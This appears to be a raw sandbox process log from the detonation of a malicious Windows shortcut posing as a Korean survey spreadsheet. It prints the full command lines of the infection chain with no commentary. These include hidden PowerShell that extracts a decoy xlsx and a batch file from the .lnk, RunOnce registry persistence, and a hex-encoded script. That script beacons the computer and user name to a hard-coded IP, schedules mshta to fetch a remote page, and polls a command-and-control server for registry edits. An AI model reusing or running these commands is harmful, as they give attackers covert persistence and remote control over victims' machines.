cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "GQRGkj" C:\Users\test22\AppData\Local\Temp\현황조사표.xlsx.lnk
2556cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c powershell -windowstyle hidden $pEbjEn = Get-Location;if($pEbjEn -Match 'System32' -or $pEbjEn -Match 'Program Files') {$pEbjEn = 'C:\Users\test22\AppData\Local\Temp'};$lyHWPSj = Get-ChildItem -Path $pEbjEn -Recurse *.lnk ^| where-object {$_.length -eq 0x18C0000} ^| Select-Object -ExpandProperty FullName;if($lyHWPSj.GetType() -Match 'Object'){$lyHWPSj = $lyHWPSj[0];};$lyHWPSj;$C5ytw = gc $lyHWPSj -Encoding Byte -TotalCount 74240 -ReadCount 74240;$tyxkEP = 'C:\Users\test22\AppData\Local\Temp\현황조사표.xlsx';sc $tyxkEP ([byte[]]($C5ytw ^| select -Skip 62464)) -Encoding Byte; ^& $tyxkEP;$Cbe1yj = gc $lyHWPSj -Encoding Byte -TotalCount 79888 -ReadCount 79888;$WH9lSPHOFI = 'C:\Users\test22\AppData\Local\Temp\PMmVvG56FLC9y.bat';sc $WH9lSPHOFI ([byte[]]($Cbe1yj ^| select -Skip 74342)) -Encoding Byte;^& C:\Windows\SysWOW64\cmd.exe /c $WH9lSPHOFI;
2652powershell.exe powershell -windowstyle hidden $pEbjEn = Get-Location;if($pEbjEn -Match 'System32' -or $pEbjEn -Match 'Program Files') {$pEbjEn = 'C:\Users\test22\AppData\Local\Temp'};$lyHWPSj = Get-ChildItem -Path $pEbjEn -Recurse *.lnk | where-object {$_.length -eq 0x18C0000} | Select-Object -ExpandProperty FullName;if($lyHWPSj.GetType() -Match 'Object'){$lyHWPSj = $lyHWPSj[0];};$lyHWPSj;$C5ytw = gc $lyHWPSj -Encoding Byte -TotalCount 74240 -ReadCount 74240;$tyxkEP = 'C:\Users\test22\AppData\Local\Temp\현황조사표.xlsx';sc $tyxkEP ([byte[]]($C5ytw | select -Skip 62464)) -Encoding Byte; & $tyxkEP;$Cbe1yj = gc $lyHWPSj -Encoding Byte -TotalCount 79888 -ReadCount 79888;$WH9lSPHOFI = 'C:\Users\test22\AppData\Local\Temp\PMmVvG56FLC9y.bat';sc $WH9lSPHOFI ([byte[]]($Cbe1yj | select -Skip 74342)) -Encoding Byte;& C:\Windows\SysWOW64\cmd.exe /c $WH9lSPHOFI;
2764EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" /e
2876reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /v BackupUserProfiles /t REG_SZ /f /d "C:\Windows\SysWOW64\cmd.exe /c C:\Users\test22\AppData\Roaming\Microsoft\Protect\UserProfileSafeBackup.bat"
3036cmd.exe C:\Windows\SysWOW64\cmd.exe /c powershell -windowstyle hidden -command "$m6drsidu ="$jWHmcU="""53746172742D536C656570202D5365636F6E64732036373B0D0A246E76536B6C55626151203D2031303234202A20313032343B0D0A247969786773465679203D2024656E763A434F4D50555445524E414D45202B20272D27202B2024656E763A555345524E414D452B272D5348273B0D0A24615777203D2027687474703A2F2F37352E3131392E3133362E3230372F636F6E6669672F62617365732F636F6E6669672E70687027202B20273F553D27202B202479697867734656793B0D0A24624C6D6F69667148774A786845203D2024656E763A54454D50202B20272F4B734B273B0D0A696620282128546573742D506174682024624C6D6F69667148774A7868452929207B0D0A204E65772D4974656D50726F7065727479202D506174682022484B43553A5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E4F6E636522202D4E616D65204F6C6D202D56616C75652027633A5C77696E646F77735C73797374656D33325C636D642E657865202F6320506F7765725368656C6C2E657865202D57696E646F775374796C652068696464656E202D4E6F4C6F676F202D4E6F6E496E746572616374697665202D6570206279706173732070696E67202D6E2031202D772033313137313420322E322E322E32207C7C206D7368746120687474703A2F2F6269616E303135312E6361666532342E636F6D2F61646D696E2F626F6172642F312E68746D6C27202D50726F70657274795479706520537472696E67202D466F7263653B0D0A7D0D0A0D0A66756E6374696F6E207576415828245A547864482C202443725A79667375615042597A290D0A7B0D0A20202020246E464B467258484B465651726F4B203D205B53797374656D2E546578742E456E636F64696E675D3A3A555446382E4765744279746573282443725A79667375615042597A293B0D0A202020205B53797374656D2E4E65742E48747470576562526571756573745D2024526E7A67717143203D205B53797374656D2E4E65742E576562526571756573745D3A3A43726561746528245A54786448293B0D0A2020202024526E7A677171432E4D6574686F64203D2027504F5354273B0D0A2020202024526E7A677171432E436F6E74656E7454797065203D20276170706C69636174696F6E2F782D7777772D666F726D2D75726C656E636F646564273B0D0A2020202024526E7A677171432E436F6E74656E744C656E677468203D20246E464B467258484B465651726F4B2E4C656E6774683B0D0A2020202024624C6D6F69667148774A78684555203D2024526E7A677171432E4765745265717565737453747265616D28293B0D0A2020202024624C6D6F69667148774A786845552E577269746528246E464B467258484B465651726F4B2C20302C20246E464B467258484B465651726F4B2E4C656E677468293B0D0A2020202024624C6D6F69667148774A786845552E466C75736828293B0D0A2020202024624C6D6F69667148774A786845552E436C6F736528293B0D0A202020205B53797374656D2E4E65742E48747470576562526573706F6E73655D20245845577742203D2024526E7A677171432E476574526573706F6E736528293B0D0A2020202024464F4F46467A6777564948203D204E65772D4F626A6563742053797374656D2E494F2E53747265616D526561646572282458455777422E476574526573706F6E736553747265616D2829293B0D0A2020202024624C6D6F69667148774A786845554C54203D2024464F4F46467A67775649482E52656164546F456E6428293B0D0A2020202072657475726E2024624C6D6F69667148774A786845554C543B0D0A7D0D0A646F0D0A7B0D0A202020205472797B0D0A2020202020202020246F7A69517575203D207576415820246157772027273B0D0A202020202020202049662028246F7A69517575202D6E6520276E756C6C27202D616E6420246F7A69517575202D6E65202727290D0A20202020202020207B0D0A202020202020202020202020246F7A695175753D246F7A695175752E537562537472696E6728312C20246F7A695175752E4C656E677468202D2032293B0D0A202020202020202020202020246250435A7562724A466F63203D205B53797374656D2E546578742E456E636F64696E675D3A3A555446382E476574537472696E67285B53797374656D2E436F6E766572745D3A3A46726F6D426173653634537472696E6728246F7A6951757529293B0D0A20202020202020202020202069662028246250435A7562724A466F63290D0A2020202020202020202020207B0D0A2020202020202020202020202020202069662028246250435A7562724A466F632E436F6E7461696E732827726567656469743A2729290D0A202020202020202020202020202020207B0D0A2020202020202020202020202020202020202020246D6274447643656E74784B3D246250435A7562724A466F632E537562537472696E672838293B0D0A202020202020202020202020202020202020202024436861724172726179203D246D6274447643656E74784B2E53706C697428277C7C27293B0D0A202020202020202020202020202020202020202069662028244368617241727261792E4C656E677468202D65712035290D0A20202020202020202020202020202020202020207B0D0A2020202020202020202020202020202020202020202020204E65772D4974656D50726F7065727479202D5061746820244368617241727261795B305D202D4E616D6520244368617241727261795B325D202D56616C756520244368617241727261795B345D202D50726F70657274795479706520537472696E67202D466F7263653B0D0A202020202020202020202020202020202020202020202020244372724B684E464F4E46474B203D2027523D27202B205B53797374656D2E436F6E766572745D3A3A546F426173653634537472696E67285B53797374656D2E546578742E456E636F64696E675D3A3A555446382E47657442797465732827454F462729293B0D0A20202020202020202020202020202020202020202020202075764158202461577720244372724B684E464F4E46474B3B0D0A20202020202020202020202020202020202020207D0D0A202020202020202020202020202020207D0D0A202020202020202020202020202020202020202020202020207D0D0A20202020202020207D0D0A202020207D2043617463687B7D0D0A7D7768696C65282474727565202D6571202474727565290D0A2020202053746172742D536C656570202D5365636F6E647320353B""";$nj4KKFFRe="""""";for($xlEKy9tdBWJ=0;$xlEKy9tdBWJ -le $jWHmcU.Length-2;$xlEKy9tdBWJ=$xlEKy9tdBWJ+2){$dYaD=$jWHmcU[$xlEKy9tdBWJ]+$jWHmcU[$xlEKy9tdBWJ+1];$nj4KKFFRe= $nj4KKFFRe+[char]([convert]::toint16($dYaD,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($nj4KKFFRe));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($m6drsidu));"
1216powershell.exe powershell -windowstyle hidden -command "$m6drsidu ="$jWHmcU="""53746172742D536C656570202D5365636F6E64732036373B0D0A246E76536B6C55626151203D2031303234202A20313032343B0D0A247969786773465679203D2024656E763A434F4D50555445524E414D45202B20272D27202B2024656E763A555345524E414D452B272D5348273B0D0A24615777203D2027687474703A2F2F37352E3131392E3133362E3230372F636F6E6669672F62617365732F636F6E6669672E70687027202B20273F553D27202B202479697867734656793B0D0A24624C6D6F69667148774A786845203D2024656E763A54454D50202B20272F4B734B273B0D0A696620282128546573742D506174682024624C6D6F69667148774A7868452929207B0D0A204E65772D4974656D50726F7065727479202D506174682022484B43553A5C536F6674776172655C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C52756E4F6E636522202D4E616D65204F6C6D202D56616C75652027633A5C77696E646F77735C73797374656D33325C636D642E657865202F6320506F7765725368656C6C2E657865202D57696E646F775374796C652068696464656E202D4E6F4C6F676F202D4E6F6E496E746572616374697665202D6570206279706173732070696E67202D6E2031202D772033313137313420322E322E322E32207C7C206D7368746120687474703A2F2F6269616E303135312E6361666532342E636F6D2F61646D696E2F626F6172642F312E68746D6C27202D50726F70657274795479706520537472696E67202D466F7263653B0D0A7D0D0A0D0A66756E6374696F6E207576415828245A547864482C202443725A79667375615042597A290D0A7B0D0A20202020246E464B467258484B465651726F4B203D205B53797374656D2E546578742E456E636F64696E675D3A3A555446382E4765744279746573282443725A79667375615042597A293B0D0A202020205B53797374656D2E4E65742E48747470576562526571756573745D2024526E7A67717143203D205B53797374656D2E4E65742E576562526571756573745D3A3A43726561746528245A54786448293B0D0A2020202024526E7A677171432E4D6574686F64203D2027504F5354273B0D0A2020202024526E7A677171432E436F6E74656E7454797065203D20276170706C69636174696F6E2F782D7777772D666F726D2D75726C656E636F646564273B0D0A2020202024526E7A677171432E436F6E74656E744C656E677468203D20246E464B467258484B465651726F4B2E4C656E6774683B0D0A2020202024624C6D6F69667148774A78684555203D2024526E7A677171432E4765745265717565737453747265616D28293B0D0A2020202024624C6D6F69667148774A786845552E577269746528246E464B467258484B465651726F4B2C20302C20246E464B467258484B465651726F4B2E4C656E677468293B0D0A2020202024624C6D6F69667148774A786845552E466C75736828293B0D0A2020202024624C6D6F69667148774A786845552E436C6F736528293B0D0A202020205B53797374656D2E4E65742E48747470576562526573706F6E73655D20245845577742203D2024526E7A677171432E476574526573706F6E736528293B0D0A2020202024464F4F46467A6777564948203D204E65772D4F626A6563742053797374656D2E494F2E53747265616D526561646572282458455777422E476574526573706F6E736553747265616D2829293B0D0A2020202024624C6D6F69667148774A786845554C54203D2024464F4F46467A67775649482E52656164546F456E6428293B0D0A2020202072657475726E2024624C6D6F69667148774A786845554C543B0D0A7D0D0A646F0D0A7B0D0A202020205472797B0D0A2020202020202020246F7A69517575203D207576415820246157772027273B0D0A202020202020202049662028246F7A69517575202D6E6520276E756C6C27202D616E6420246F7A69517575202D6E65202727290D0A20202020202020207B0D0A202020202020202020202020246F7A695175753D246F7A695175752E537562537472696E6728312C20246F7A695175752E4C656E677468202D2032293B0D0A202020202020202020202020246250435A7562724A466F63203D205B53797374656D2E546578742E456E636F64696E675D3A3A555446382E476574537472696E67285B53797374656D2E436F6E766572745D3A3A46726F6D426173653634537472696E6728246F7A6951757529293B0D0A20202020202020202020202069662028246250435A7562724A466F63290D0A2020202020202020202020207B0D0A2020202020202020202020202020202069662028246250435A7562724A466F632E436F6E7461696E732827726567656469743A2729290D0A202020202020202020202020202020207B0D0A2020202020202020202020202020202020202020246D6274447643656E74784B3D246250435A7562724A466F632E537562537472696E672838293B0D0A202020202020202020202020202020202020202024436861724172726179203D246D6274447643656E74784B2E53706C697428277C7C27293B0D0A202020202020202020202020202020202020202069662028244368617241727261792E4C656E677468202D65712035290D0A20202020202020202020202020202020202020207B0D0A2020202020202020202020202020202020202020202020204E65772D4974656D50726F7065727479202D5061746820244368617241727261795B305D202D4E616D6520244368617241727261795B325D202D56616C756520244368617241727261795B345D202D50726F70657274795479706520537472696E67202D466F7263653B0D0A202020202020202020202020202020202020202020202020244372724B684E464F4E46474B203D2027523D27202B205B53797374656D2E436F6E766572745D3A3A546F426173653634537472696E67285B53797374656D2E546578742E456E636F64696E675D3A3A555446382E47657442797465732827454F462729293B0D0A20202020202020202020202020202020202020202020202075764158202461577720244372724B684E464F4E46474B3B0D0A20202020202020202020202020202020202020207D0D0A202020202020202020202020202020207D0D0A202020202020202020202020202020202020202020202020207D0D0A20202020202020207D0D0A202020207D2043617463687B7D0D0A7D7768696C65282474727565202D6571202474727565290D0A2020202053746172742D536C656570202D5365636F6E647320353B""";$nj4KKFFRe="""""";for($xlEKy9tdBWJ=0;$xlEKy9tdBWJ -le $jWHmcU.Length-2;$xlEKy9tdBWJ=$xlEKy9tdBWJ+2){$dYaD=$jWHmcU[$xlEKy9tdBWJ]+$jWHmcU[$xlEKy9tdBWJ+1];$nj4KKFFRe= $nj4KKFFRe+[char]([convert]::toint16($dYaD,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($nj4KKFFRe));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($m6drsidu));"
2108